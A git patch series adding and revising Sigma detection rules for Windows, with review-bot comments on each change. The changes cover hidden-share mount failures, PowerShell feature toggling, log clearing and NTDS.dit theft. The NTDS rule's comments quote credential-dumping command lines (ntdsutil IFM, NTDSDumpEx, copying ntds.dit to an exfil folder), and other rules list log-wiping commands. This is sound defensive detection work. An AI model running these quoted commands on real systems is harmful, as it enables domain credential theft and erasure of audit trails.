From 3a020ce4997d0b1e05fae771ad215632d47071ff Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:57:09 +0200 Subject: [PATCH 01/96] added "failed admin share mount" rule --- .../win_susp_failed_admin_share_mount.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml new file mode 100644 index 000000000..6d6470981 --- /dev/null +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -0,0 +1,28 @@ +title: Repeated failed mounting of administrative share +id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb +description: Detects failed (outgoing) attempts to mount an administrative share +author: Fabian Franz +status: experimental +level: medium +references: + - https://twitter.com/moti_b/status/1032645458634653697 + - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +date: 2022/08/30 +modified: 2022/08/30 +logsource: + product: windows + service: smbclient-security +detection: + selection: + EventID: 31010 + ShareName|endswith: '$' + condition: + - selection | count() > 10 +fields: + - ShareName +falsepositives: + - Legitimate administrative activity + - Faulty scripts +tags: + - attack.t1021.002 + - attack.lateral_movement \ No newline at end of file From df2ef5a2ee7c2a35d4cb93c45efd8f46a4bf8533 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 31 Aug 2022 09:59:29 +0200 Subject: [PATCH 02/96] added missing newline --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
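Review bot: `condition: - selection | count() > 10` counts event 31010 across every host that forwards the smbclient-security log — there is no `by` clause — so on a large fleet the threshold is crossed by unrelated, routine mount failures, while repeated failures from a single client on a quiet fleet can stay under it. A per-source count, `condition: selection | count() by Computer > 10`, matches the intent of the description ("repeated ... attempts"); presumably `Computer` is populated for these events, but verify against a sample before relying on it. The same ungrouped count is carried forward by the condition rewrite in patch 04 and by the `timeframe: 10m` hunk in patch 06.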
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 6d6470981..2fbc5497e 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -25,4 +25,4 @@ falsepositives: - Faulty scripts tags: - attack.t1021.002 - - attack.lateral_movement \ No newline at end of file + - attack.lateral_movement From ab9e15f4563b899953b6b7ce628714ef00a2cfa4 Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Thu, 1 Sep 2022 17:05:32 +0200 Subject: [PATCH 03/96] fix title --- .../builtin/smbclient/win_susp_failed_admin_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index 2fbc5497e..d18cc79b7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,6 +1,6 @@ -title: Repeated failed mounting of administrative share +title: Failed Mounting of Administrative Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental level: medium From 3d9d90f43efc41692047e3ca0ba527f87c78b1f1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 2 Sep 2022 17:24:28 +0200 Subject: [PATCH 04/96] Update win_susp_failed_admin_share_mount.yml --- .../smbclient/win_susp_failed_admin_share_mount.yml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) 
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml index d18cc79b7..9ff0745f6 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml @@ -1,12 +1,14 @@ -title: Failed Mounting of Administrative Share +title: Multiple Failed Mount Attempts of Admin Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb description: Detects repeated failed (outgoing) attempts to mount an administrative share author: Fabian Franz status: experimental -level: medium references: - https://twitter.com/moti_b/status/1032645458634653697 - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +tags: + - attack.t1021.002 + - attack.lateral_movement date: 2022/08/30 modified: 2022/08/30 logsource: @@ -16,13 +18,10 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + condition: selection | count() > 10 fields: - ShareName falsepositives: - Legitimate administrative activity - Faulty scripts -tags: - - attack.t1021.002 - - attack.lateral_movement +level: medium From a8eb1ba9723ff94c8cd4bf7545ce393d24bc06af Mon Sep 17 00:00:00 2001 From: FabFaeb Date: Wed, 7 Sep 2022 16:52:09 +0200 Subject: [PATCH 05/96] rename rule --- ...share_mount.yml => win_susp_failed_hidden_share_mount.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/builtin/smbclient/{win_susp_failed_admin_share_mount.yml => win_susp_failed_hidden_share_mount.yml} (91%) 
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml similarity index 91% rename from rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml rename to rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index d18cc79b7..5b3c831e7 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_admin_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -1,6 +1,6 @@ -title: Failed Mounting of Administrative Share +title: Failed Mounting of Hidden Share id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb -description: Detects repeated failed (outgoing) attempts to mount an administrative share +description: Detects repeated failed (outgoing) attempts to mount an hidden share author: Fabian Franz status: experimental level: medium From 860c45a0380c0814f292831996864b10d36fc6bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 9 Sep 2022 17:07:45 +0200 Subject: [PATCH 06/96] added time frame --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index 1089f8c9c..ab736de4d 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,8 +16,8 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - condition: - - selection | count() > 10 + timeframe: 10m + condition: selection | count() > 10 fields: - ShareName falsepositives: From 486fdabe340bd344900de3a36d1e9cd102f5a777 Mon Sep 17 00:00:00 2001 
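Review bot: The rewritten description reads `Detects repeated failed (outgoing) attempts to mount an hidden share`; it should say `a hidden share`. The rename does fit the detection better than the old title, since `ShareName|endswith: '$'` matches any hidden share rather than only the administrative ones, and a clause in the description stating that would save the next reader the check. Note that this hunk's `index d18cc79b7` is the blob from before patch 04, so the commit was made on a branch without that rewrite; the merged result is not visible here.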
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:15:36 +0200 Subject: [PATCH 07/96] Add posh_ps_disable_windowsoptionalfeature --- ...posh_ps_disable_windowsoptionalfeature.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml new file mode 100644 index 000000000..601f6b71f --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -0,0 +1,35 @@ +title: Disable-WindowsOptionalFeature Command PowerShell +id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 +status: experimental +author: frack113 +date: 2021/09/10 +description: | + Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md + - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Disable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any important windows features + ScriptBlockText|contains: + - 'Windows-Defender-Gui' + - 'Windows-Defender-Features' + - 'Windows-Defender' + - 'Windows-Defender-ApplicationGuard' + condition: all of selection* +falsepositives: + - Unknown +level: high 
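Review bot: In `selection_feature`, `'Windows-Defender'` is a substring of the other three entries, so under `ScriptBlockText|contains` the entries `'Windows-Defender-Gui'`, `'Windows-Defender-Features'` and `'Windows-Defender-ApplicationGuard'` can never match a script block that the bare entry does not already match. Either keep only `- 'Windows-Defender'`, or, if the longer names are meant to document which features matter, say so in the `# Add any important windows features` comment so the redundancy is not "fixed" later. The description would also read more clearly as `Detects the built-in DISM PowerShell cmdlet Disable-WindowsOptionalFeature being used to remove Windows Defender features`.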
From 5996fbf4c9b4d5502272780d558ade92eb4e7828 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 10 Sep 2022 19:23:58 +0200 Subject: [PATCH 08/96] Fix tag --- .../posh_ps_disable_windowsoptionalfeature.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 601f6b71f..0bee0b729 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml @@ -2,7 +2,7 @@ title: Disable-WindowsOptionalFeature Command PowerShell id: 99c4658d-2c5e-4d87-828d-7c066ca537c3 status: experimental author: frack113 -date: 2021/09/10 +date: 2022/09/10 description: | Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images @@ -10,8 +10,8 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps tags: - - attack.collection - - attack.t1119 + - attack.defense_evasion + - attack.t1562.001 logsource: product: windows category: ps_script From a5fe2857764fbb3287e98cadb9bc3caf7f6a9090 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 11 Sep 2022 16:28:04 +0200 Subject: [PATCH 09/96] fix: too many FPs during Windows update - User empty --- .../image_load_side_load_from_non_system_location.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) 
diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index a37434bed..acbbd1f87 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/08/24 +modified: 2022/09/11 tags: - attack.defense_evasion - attack.persistence @@ -418,9 +418,6 @@ detection: - 'C:\Windows\SoftwareDistribution\' filter_systemp: ImageLoaded|startswith: 'C:\Windows\SystemTemp\' - User|contains: # covers many language settings - - 'AUTHORI' - - 'AUTORI' filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe From 51076b20783ecb833c5ccd217589fa577db4765a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:29:15 +0200 Subject: [PATCH 10/96] Update posh_ps_disable_windowsoptionalfeature.yml --- .../powershell_script/posh_ps_disable_windowsoptionalfeature.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml index 0bee0b729..df3121e56 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml 
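Review bot: Dropping `User|contains` from `filter_systemp` makes the filter exclude every DLL loaded from `C:\Windows\SystemTemp\` regardless of account, which is wider than the problem the commit names (an empty `User` during Windows Update). If only the empty case needs tolerating, keep the account check and add a sibling filter such as `filter_systemp_nouser:` with `ImageLoaded|startswith: 'C:\Windows\SystemTemp\'` and `User: ''` — assuming the rule's condition, which is outside the hunk, is of the `not 1 of filter*` form. If the widening is intentional because SystemTemp is, as far as I know, writable only by SYSTEM and Administrators, a comment on the `ImageLoaded|startswith` line recording that reasoning would stop a later reviewer from re-narrowing it.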
@@ -29,6 +29,7 @@ detection: - 'Windows-Defender-Features' - 'Windows-Defender' - 'Windows-Defender-ApplicationGuard' + #- 'Containers-DisposableClientVM' # Windows Sandbox condition: all of selection* falsepositives: - Unknown From f4da079d1358922856fbbbe1d7511b97c04ad978 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 11 Sep 2022 19:43:54 +0200 Subject: [PATCH 11/96] Add posh_ps_enable_windowsoptionalfeature --- .../posh_ps_enable_windowsoptionalfeature.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml new file mode 100644 index 000000000..c37b1dd75 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml 
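Review bot: The commented-out `#- 'Containers-DisposableClientVM' # Windows Sandbox` records what the feature is but not why it is left disabled, so later nobody can tell whether this was a false-positive decision or an oversight. Extend the trailing comment with the reason, e.g. `# Windows Sandbox - not enabled: <reason>`, or drop the line if it is not intended to be activated.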
@@ -0,0 +1,33 @@ +title: Enable-WindowsOptionalFeature Command PowerShell +id: 55c925c1-7195-426b-a136-a9396800e29b +status: experimental +author: frack113 +date: 2022/09/10 +description: | + Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +references: + - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps +tags: + - attack.defense_evasion +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_cmd: + ScriptBlockText|contains|all: + - 'Enable-WindowsOptionalFeature' + - '-Online' + - '-FeatureName' + selection_feature: + # Add any unsecure windows features + ScriptBlockText|contains: + - 'TelnetServer' + - 'Internet-Explorer-Optional-amd64' + - 'TFTP' + - 'SMB1Protocol' + condition: all of selection* +falsepositives: + - Unknown +level: medium From 0bbb679e38cdf553db2829d06cb859fe9b6ce2be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:29:51 +0200 Subject: [PATCH 12/96] fix: FPs with veam backup shell --- .../proc_creation_win_ntfs_short_name_path_use_cli.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 76b3888e5..6fe080f91 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml 
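Review bot: `'Internet-Explorer-Optional-amd64'` in `selection_feature` only matches the 64-bit feature name; to my knowledge the 32-bit variant is `Internet-Explorer-Optional-x86`, so `- 'Internet-Explorer-Optional-'` covers both without meaningfully widening the match. The `tags` list carries only the tactic `attack.defense_evasion` with no technique id, unlike the sibling Disable rule (`attack.t1562.001`), and enabling Telnet, TFTP or SMB1 is not obviously defense evasion — either name the technique intended or choose a tactic that fits. The description is copied from the Disable rule and would read better as `Detects the built-in DISM PowerShell cmdlet Enable-WindowsOptionalFeature being used to turn on insecure Windows features`.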
@@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/12 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '\veam.backup.shell.exe' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. From 5f164ebe1279ce9b38941dc67fb68b686d172e46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:30:14 +0200 Subject: [PATCH 13/96] style: indentation --- .../proc_creation_win_susp_ntds.yml | 108 +++++++++--------- 1 file changed, 54 insertions(+), 54 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml index 42b539ce4..0775c1450 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml 
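Review bot: The new filter entry `'\veam.backup.shell.exe'` looks misspelled — the Veeam Backup & Replication console binary is, to my knowledge, `Veeam.Backup.Shell.exe` (double e), so this `ParentImage|endswith` entry will not match the process the commit is trying to exclude and the false positives will remain. Change it to `- '\Veeam.Backup.Shell.exe'` and confirm the spelling against an actual event; the commit subject carries the same spelling, so it may have been typed from memory rather than copied from the log.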
@@ -4,63 +4,63 @@ description: Detects suspicious process patterns used in NTDS.DIT exfiltration status: experimental author: Florian Roth references: - - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - - https://pentestlab.blog/tag/ntds-dit/ - - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - - https://github.com/zcgonvh/NTDSDumpEx - - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration + - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ + - https://pentestlab.blog/tag/ntds-dit/ + - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 + - https://github.com/zcgonvh/NTDSDumpEx + - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 + - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 date: 2022/03/11 tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 logsource: - product: windows - category: process_creation + product: windows + category: process_creation detection: - selection_tool: - # https://github.com/zcgonvh/NTDSDumpEx - - Image|endswith: - - '\NTDSDump.exe' - - '\NTDSDumpEx.exe' - - CommandLine|contains|all: - # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv - - 'ntds.dit' - - 'system.hiv' - - CommandLine|contains: 'NTDSgrab.ps1' - selection_oneliner_1: - # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" - CommandLine|contains|all: - - 'ac i ntds' - - 'create 
full' - selection_onliner_2: - # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit - CommandLine|contains|all: - - '/c copy ' - - '\windows\ntds\ntds.dit' - selection_powershell: - CommandLine|contains|all: - - 'powershell' - - 'ntds.dit' - set1_selection_ntds_dit: - CommandLine|contains: 'ntds.dit' - set1_selection_image_folder: - - ParentImage|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - - Image|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - condition: 1 of selection* or all of set1* + selection_tool: + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - '\NTDSDump.exe' + - '\NTDSDumpEx.exe' + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - 'ntds.dit' + - 'system.hiv' + - CommandLine|contains: 'NTDSgrab.ps1' + selection_oneliner_1: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: + - 'ac i ntds' + - 'create full' + selection_onliner_2: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: + - '/c copy ' + - '\windows\ntds\ntds.dit' + selection_powershell: + CommandLine|contains|all: + - 'powershell' + - 'ntds.dit' + set1_selection_ntds_dit: + CommandLine|contains: 'ntds.dit' + set1_selection_image_folder: + - ParentImage|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + - Image|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + condition: 1 of selection* or all of set1* falsepositives: - - Unknown + - Unknown level: high From 0caeaaa12224700f0f502b9077568b19be893d83 Mon Sep 17 00:00:00 2001 
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:32 +0200 Subject: [PATCH 14/96] Update rules --- ..._susp_prog_location_network_connection.yml | 50 +++++++++---------- .../proc_creation_win_susp_eventlog_clear.yml | 17 ++++--- 2 files changed, 34 insertions(+), 33 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml index 2c87f50da..0df871e90 100755 --- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml 
@@ -4,36 +4,36 @@ status: test description: Detects programs with network connections running in suspicious files system locations author: Florian Roth, Tim Shelton references: - - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo + - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo date: 2017/03/19 modified: 2022/05/26 logsource: - category: network_connection - product: windows - definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' + category: network_connection + product: windows + definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events' detection: - selection: - - Image|contains: + selection: + - Image|contains: # - '\ProgramData\' # too many false positives, e.g. with Webex for Windows - - '\Users\All Users\' - - '\Users\Default\' - - '\Users\Public\' - - '\Users\Contacts\' - - '\Users\Searches\' - - '\config\systemprofile\' - - '\Windows\Fonts\' - - '\Windows\IME\' - - '\Windows\addins\' - - Image|endswith: - - '\$Recycle.bin' - - Image|startswith: - - 'C:\Perflogs\' - false_positive1: - Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location - condition: selection and not 1 of false_positive* + - '\Users\All Users\' + - '\Users\Default\' + - '\Users\Public\' + - '\Users\Contacts\' + - '\Users\Searches\' + - '\config\systemprofile\' + - '\Windows\Fonts\' + - '\Windows\IME\' + - '\Windows\addins\' + - Image|endswith: + - '\$Recycle.bin' + - Image|startswith: + - 'C:\Perflogs\' + false_positive1: + Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location + condition: selection and not 1 of false_positive* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.command_and_control - - attack.t1105 + - attack.command_and_control + - attack.t1105 
diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml index da3d019ac..322528935 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html date: 2019/09/26 -modified: 2022/07/14 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -15,18 +15,19 @@ detection: selection_wevtutil: Image|endswith: '\wevtutil.exe' CommandLine|contains: - - 'clear-log' # clears specified log - - ' cl ' # short version of 'clear-log' - - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size - - ' sl ' # short version of 'set-log' + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' selection_other_ps: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - - 'Clear-EventLog' - - 'Remove-EventLog' - - 'Limit-EventLog' + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' selection_other_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: ' ClearEventLog ' From 6fa682b619e5751d37b6e75dfe265bfc447c8e16 Mon Sep 17 00:00:00 2001 
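Review bot: `'Clear-WinEvent '` is added to `selection_other_ps`, but I am not aware of a built-in cmdlet by that name (the Diagnostics module ships `Get-WinEvent` and `New-WinEvent`); if it refers to a function from a known script or module, a trailing comment naming the source would justify keeping it, otherwise it is dead weight in the list. The trailing spaces added to `'clear-log '`, `'set-log '`, `'Clear-EventLog '` and the others anchor each match on a following argument, which trims false positives but also excludes invocations where nothing follows the cmdlet name; recording that trade-off in a comment on the list would keep it from being undone later. Both points apply equally to the `ScriptBlockText|contains` list in the new rule of patch 15.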
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 10:02:36 +0200 Subject: [PATCH 15/96] Create posh_ps_susp_clear_eventlog.yml --- .../posh_ps_susp_clear_eventlog.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 From 8a504bee9ef34b1e1591514006b8e18287844e51 Mon Sep 17 00:00:00 2001 
